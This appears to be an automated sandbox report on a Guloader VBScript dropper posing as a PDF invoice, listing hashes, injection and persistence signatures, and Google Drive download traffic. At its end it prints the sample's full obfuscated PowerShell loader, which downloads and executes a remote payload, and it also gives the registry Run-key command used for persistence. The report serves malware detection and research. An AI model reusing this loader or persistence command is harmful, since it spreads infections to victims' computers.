Analysis
-
max time kernel
299s -
max time network
292s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
19-09-2024 06:31
Static task
static1
Behavioral task
behavioral1
Sample
Faktura_7122128240·pdf.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Faktura_7122128240·pdf.vbs
Resource
win10v2004-20240802-en
General
-
Target
Faktura_7122128240·pdf.vbs
-
Size
7KB
-
MD5
cc6e41e0786764096a50057a3743e7c6
-
SHA1
2493a1410d91a8084249ef9f0b3e7aa885ddef5d
-
SHA256
7e4a39824d8b86485d45a17ebd90a40e02a356a6a3457574303853decb61e09d
-
SHA512
5bfe75eb2661459a1073348cfadb64ced142baae9ff54fcd7a8733ae7ffc750f9ab41f2e1415ed275c7ec9f33257a7201bf0e5881ff0d26c2eac644c04aee38c
-
SSDEEP
96:lmXU2FvaJR+t7tVQm+83tkD3J8j0dEvOItsLQWSK+PtevdOYPmCVUbtCpgjPVHQv:lmk2VaJeXj0exCnItmd/Pml9jPp4jQYB
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 15 4868 powershell.exe 18 4868 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Heliometry% -w 1 $Rrligst138=(Get-ItemProperty -Path 'HKCU:\\Hyperaktuelles\\').Midwintry;%Heliometry% ($Rrligst138)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 14 drive.google.com 15 drive.google.com 30 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 3704 wab.exe 3704 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2184 powershell.exe 3704 wab.exe -
Suspicious use of SetThreadContext 64 IoCs
description pid Process procid_target PID 2184 set thread context of 3704 2184 powershell.exe 94 PID 3704 set thread context of 6096 3704 wab.exe 100 PID 3704 set thread context of 5600 3704 wab.exe 101 PID 3704 set thread context of 2416 3704 wab.exe 103 PID 3704 set thread context of 5852 3704 wab.exe 104 PID 3704 set thread context of 4080 3704 wab.exe 105 PID 3704 set thread context of 3452 3704 wab.exe 106 PID 3704 set thread context of 352 3704 wab.exe 107 PID 3704 set thread context of 4152 3704 wab.exe 108 PID 3704 set thread context of 2276 3704 wab.exe 109 PID 3704 set thread context of 2252 3704 wab.exe 110 PID 3704 set thread context of 2344 3704 wab.exe 111 PID 3704 set thread context of 1644 3704 wab.exe 112 PID 3704 set thread context of 4212 3704 wab.exe 113 PID 3704 set thread context of 4988 3704 wab.exe 114 PID 3704 set thread context of 5440 3704 wab.exe 115 PID 3704 set thread context of 5704 3704 wab.exe 116 PID 3704 set thread context of 1072 3704 wab.exe 117 PID 3704 set thread context of 1032 3704 wab.exe 118 PID 3704 set thread context of 4000 3704 wab.exe 119 PID 3704 set thread context of 4456 3704 wab.exe 120 PID 3704 set thread context of 3172 3704 wab.exe 121 PID 3704 set thread context of 3168 3704 wab.exe 122 PID 3704 set thread context of 4396 3704 wab.exe 123 PID 3704 set thread context of 4264 3704 wab.exe 124 PID 3704 set thread context of 4688 3704 wab.exe 125 PID 3704 set thread context of 5060 3704 wab.exe 126 PID 3704 set thread context of 3272 3704 wab.exe 127 PID 3704 set thread context of 4316 3704 wab.exe 128 PID 3704 set thread context of 4392 3704 wab.exe 129 PID 3704 set thread context of 1220 3704 wab.exe 130 PID 3704 set thread context of 6020 3704 wab.exe 131 PID 3704 set thread context of 1196 3704 wab.exe 132 PID 3704 set thread context of 3224 3704 wab.exe 133 PID 3704 set thread context of 5288 3704 wab.exe 134 PID 3704 set thread context of 1820 3704 wab.exe 135 PID 3704 set thread context of 6060 3704 wab.exe 136 PID 3704 set thread context of 5676 3704 wab.exe 137 PID 3704 set thread context of 5236 3704 wab.exe 138 PID 3704 set thread context of 4840 3704 wab.exe 139 PID 3704 set thread context of 1504 3704 wab.exe 140 PID 3704 set thread context of 2944 3704 wab.exe 141 PID 3704 set thread context of 400 3704 wab.exe 142 PID 3704 set thread context of 1760 3704 wab.exe 143 PID 3704 set thread context of 1676 3704 wab.exe 144 PID 3704 set thread context of 4348 3704 wab.exe 145 PID 3704 set thread context of 2568 3704 wab.exe 146 PID 3704 set thread context of 3156 3704 wab.exe 147 PID 3704 set thread context of 1988 3704 wab.exe 148 PID 3704 set thread context of 576 3704 wab.exe 149 PID 3704 set thread context of 4884 3704 wab.exe 150 PID 3704 set thread context of 5216 3704 wab.exe 151 PID 3704 set thread context of 2232 3704 wab.exe 152 PID 3704 set thread context of 2928 3704 wab.exe 153 PID 3704 set thread context of 4548 3704 wab.exe 154 PID 3704 set thread context of 5680 3704 wab.exe 155 PID 3704 set thread context of 6024 3704 wab.exe 156 PID 3704 set thread context of 1536 3704 wab.exe 157 PID 3704 set thread context of 5464 3704 wab.exe 158 PID 3704 set thread context of 2236 3704 wab.exe 159 PID 3704 set thread context of 4864 3704 wab.exe 160 PID 3704 set thread context of 876 3704 wab.exe 161 PID 3704 set thread context of 1512 3704 wab.exe 162 PID 3704 set thread context of 3756 3704 wab.exe 163 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings svchost.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 5196 reg.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 4868 powershell.exe 4868 powershell.exe 2184 powershell.exe 2184 powershell.exe 2184 powershell.exe -
Suspicious behavior: MapViewOfSection 64 IoCs
pid Process 2184 powershell.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe 3704 wab.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4868 powershell.exe Token: SeDebugPrivilege 2184 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3704 wab.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4808 wrote to memory of 4868 4808 WScript.exe 83 PID 4808 wrote to memory of 4868 4808 WScript.exe 83 PID 4868 wrote to memory of 3836 4868 powershell.exe 85 PID 4868 wrote to memory of 3836 4868 powershell.exe 85 PID 4868 wrote to memory of 2184 4868 powershell.exe 92 PID 4868 wrote to memory of 2184 4868 powershell.exe 92 PID 4868 wrote to memory of 2184 4868 powershell.exe 92 PID 2184 wrote to memory of 5880 2184 powershell.exe 93 PID 2184 wrote to memory of 5880 2184 powershell.exe 93 PID 2184 wrote to memory of 5880 2184 powershell.exe 93 PID 2184 wrote to memory of 3704 2184 powershell.exe 94 PID 2184 wrote to memory of 3704 2184 powershell.exe 94 PID 2184 wrote to memory of 3704 2184 powershell.exe 94 PID 2184 wrote to memory of 3704 2184 powershell.exe 94 PID 2184 wrote to memory of 3704 2184 powershell.exe 94 PID 3704 wrote to memory of 3900 3704 wab.exe 96 PID 3704 wrote to memory of 3900 3704 wab.exe 96 PID 3704 wrote to memory of 3900 3704 wab.exe 96 PID 3900 wrote to memory of 5196 3900 cmd.exe 98 PID 3900 wrote to memory of 5196 3900 cmd.exe 98 PID 3900 wrote to memory of 5196 3900 cmd.exe 98 PID 3704 wrote to memory of 6096 3704 wab.exe 100 PID 3704 wrote to memory of 6096 3704 wab.exe 100 PID 3704 wrote to memory of 6096 3704 wab.exe 100 PID 3704 wrote to memory of 6096 3704 wab.exe 100 PID 3704 wrote to memory of 5600 3704 wab.exe 101 PID 3704 wrote to memory of 5600 3704 wab.exe 101 PID 3704 wrote to memory of 5600 3704 wab.exe 101 PID 3704 wrote to memory of 5600 3704 wab.exe 101 PID 3704 wrote to memory of 2416 3704 wab.exe 103 PID 3704 wrote to memory of 2416 3704 wab.exe 103 PID 3704 wrote to memory of 2416 3704 wab.exe 103 PID 3704 wrote to memory of 2416 3704 wab.exe 103 PID 3704 wrote to memory of 5852 3704 wab.exe 104 PID 3704 wrote to memory of 5852 3704 wab.exe 104 PID 3704 wrote to memory of 5852 3704 wab.exe 104 PID 3704 wrote to memory of 5852 3704 wab.exe 104 PID 3704 wrote to memory of 4080 3704 wab.exe 105 PID 3704 wrote to memory of 4080 3704 wab.exe 105 PID 3704 wrote to memory of 4080 3704 wab.exe 105 PID 3704 wrote to memory of 4080 3704 wab.exe 105 PID 3704 wrote to memory of 3452 3704 wab.exe 106 PID 3704 wrote to memory of 3452 3704 wab.exe 106 PID 3704 wrote to memory of 3452 3704 wab.exe 106 PID 3704 wrote to memory of 3452 3704 wab.exe 106 PID 3704 wrote to memory of 352 3704 wab.exe 107 PID 3704 wrote to memory of 352 3704 wab.exe 107 PID 3704 wrote to memory of 352 3704 wab.exe 107 PID 3704 wrote to memory of 352 3704 wab.exe 107 PID 3704 wrote to memory of 4152 3704 wab.exe 108 PID 3704 wrote to memory of 4152 3704 wab.exe 108 PID 3704 wrote to memory of 4152 3704 wab.exe 108 PID 3704 wrote to memory of 4152 3704 wab.exe 108 PID 3704 wrote to memory of 2276 3704 wab.exe 109 PID 3704 wrote to memory of 2276 3704 wab.exe 109 PID 3704 wrote to memory of 2276 3704 wab.exe 109 PID 3704 wrote to memory of 2276 3704 wab.exe 109 PID 3704 wrote to memory of 2252 3704 wab.exe 110 PID 3704 wrote to memory of 2252 3704 wab.exe 110 PID 3704 wrote to memory of 2252 3704 wab.exe 110 PID 3704 wrote to memory of 2252 3704 wab.exe 110 PID 3704 wrote to memory of 2344 3704 wab.exe 111 PID 3704 wrote to memory of 2344 3704 wab.exe 111 PID 3704 wrote to memory of 2344 3704 wab.exe 111
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Faktura_7122128240·pdf.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Automanipulation='sramana';$Arsenyl=${host}.Runspace;If ($Arsenyl) {$Forhjulstrkket++;$Automanipulation+='Periosteum';$Miljreform='s';$Automanipulation+='Kostfri';$Miljreform+='ubst';$Automanipulation+='simarubaceous';$Miljreform+='ri';$Automanipulation+='Unindigenous';$Miljreform+='ng';};Function Diskpladsers76($Fimsenes){$Glycocholate51=$Fimsenes.Length-$Forhjulstrkket;For( $Agrin=1;$Agrin -lt $Glycocholate51;$Agrin+=2){$Callahan10+=$Fimsenes.$Miljreform.'Invoke'( $Agrin, $Forhjulstrkket);}$Callahan10;}function Albueben($Rundhaandedes){ . ($Forlbelsers) ($Rundhaandedes);}$Kontinuerliges193=Diskpladsers76 'KMboUzGiBl.lCa /P5 .M0s (,WGi,nsdCoswssM NATU F1 0R.P0 ;T .W i nF6F4L; RxC6 4 ;, Or v :U1 2 1c.O0 ) OGNe cAkTo /.2 0s1 0.0 1s0K1G DFci r,eBfBoixM/s1F2 1 . 0 ';$Eskortefartjernes=Diskpladsers76 ',UKs e rM-NA g,eCnBt ';$Bldgrers=Diskpladsers76 'ChOtstFp s : /T/.d.r.iPvTeK.EgMoKo gFlFe .AcEo,mp/Au,cJ?Ee xsp o r t =NdCo,wEnsl oPaIdP& iPd,=B1bC,7 HC1 t f U mCn _ajsU C F KDlFE.8asJ6UFsFL_,0 M Y,v Y n gA9 iH ';$Foresattes=Diskpladsers76 ',>. ';$Forlbelsers=Diskpladsers76 'Oi e xP ';$skandinavismens='Hrenes';$Konsignationen = Diskpladsers76 'DeNc hGo .%.a pFp dEa tFa.%.\KT hPeRiss..,W,e eP &,&U e.cFhFo, st, ';Albueben (Diskpladsers76 ' $ g.l okb a l.:ssAc.o u,r,sI=B( c m.d, /Oc .$ KCo,nFsDi g nma,tCi o nGeTnr)I ');Albueben (Diskpladsers76 '.$Pgsl,oTbVaslB: LPi qNu iRd,iEz eCd.6 6R=K$ BVlsdFg r e r s .Us p lEiPtM(.$ FZoFr.e,s ast t.eXs ). ');Albueben (Diskpladsers76 'R[sNTe t . sbe rNveiOcbe,P oIifnBt M a nTaEgAeCrU].:,: s etc uArRi t y P,rNo.tsoDc,oBlT T=. .[.N eDt,.Bsme cPu r iUt yRPDr ost.o,cEoNlPT y pCe ]s:D: T.l sF1E2, ');$Bldgrers=$Liquidized66[0];$sknnere= (Diskpladsers76 'G$Ug lDoTb.a,lF:FCTosp isnbgBs =FNUeBw.-VOYbUj,ePc.t Ps y s.t.eBm . N.eAt .TWCeFb C.l.iAeTn t');$sknnere+=$scours[1];Albueben ($sknnere);Albueben (Diskpladsers76 't$.Cso,p.i.n gBs...H,e,a.dseOrHsN[E$.EOs.kMoNr tCeIfEairHt jReArHn.ets ] = $.K,o n t i.n u e r.l i g e sC1 9 3U ');$Opt=Diskpladsers76 ' $ CIoIp.iDnBg.ss. D o w.n lOo aGd F iFl eB( $ BPlsdIg r.e,r.sD,,$CD iCePs,e.l i zTaBt iPo nEsO)F ';$Dieselizations=$scours[0];Albueben (Diskpladsers76 ' $Tg,l o b aTl,:,B o y efs =,(CTEessOtA-YP a tLh, P$TDHiLeTs,eEl iEz aNtPi o.nDsU)s ');while (!$Boyes) {Albueben (Diskpladsers76 'a$ g l oPb,asl : sOm i.t.aBbBl e,=P$at rVuKe ') ;Albueben $Opt;Albueben (Diskpladsers76 ' sPtUa,r,t.-fs lPesesps R4, ');Albueben (Diskpladsers76 ',$BgslRo,b aWl :,BLo yDeRs =M( TGe.sHtM-OP.aMtshP M$,DsireLs eFl i z.a t.iEo,nFs ) ') ;Albueben (Diskpladsers76 'I$ g l,o,b.aulT:EG r u nEd.sBk u d dPeVt,9,0s=.$FgRl oTb aslB:IL nCsPu.msmUe rL+B+C%A$ LDiAqsu i dPiBzPe dH6.6P. c oAuan,t. ') ;$Bldgrers=$Liquidized66[$Grundskuddet90];}$Rensningsforanstaltninger=311121;$Denaturerende=27562;Albueben (Diskpladsers76 ' $sgPlso,b a.l :bF o rAr.eGtKnPipn g.s gAr uFn dsl a g =W G.e tD-MCsoGnEtAeAn tR H$HD iOeMsLe,l,i zIaRtUi,o,n s. ');Albueben (Diskpladsers76 'A$.g lPo b a ls:NsBp eTc,i f.iTkUaTtsiso,n s m e t o dFiBkCsB .=, ,[ sfy sOtsePmH. C,o nPv eArCtA]d:C:AF,r oFmGBGa s eB6 4,s.t.rEiUnAg ( $GF osrsrPe.t nei n g sOg rAu nCdslmaHgE)M ');Albueben (Diskpladsers76 '.$ gsl o bVaTl :.GraFl a,nBe r b= k[ sAyUs,tIesmK.,T.e.xPta.IE.nsc oVd,iHn,g ],:s:KAFs C,I Ie. GTe,tFs,t.r,iPnDgD(,$Ks.p e c.i.f i ksaAt.iPo nss,mTe.t o d,i.k s )T ');Albueben (Diskpladsers76 'g$Fg l,oKb,aHl :.H a eUm.n i nTg.= $sG.aLl a,nEe r,.Ns u,b,sAtGr i,nLg.(s$HR e.n,s.n.i nRg,sRf o.r.a,n,s,tAa l t,nRi n,gse rb,s$ DWe nGa,t u rMe.rReDnsdCes)I ');Albueben $Haemning;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
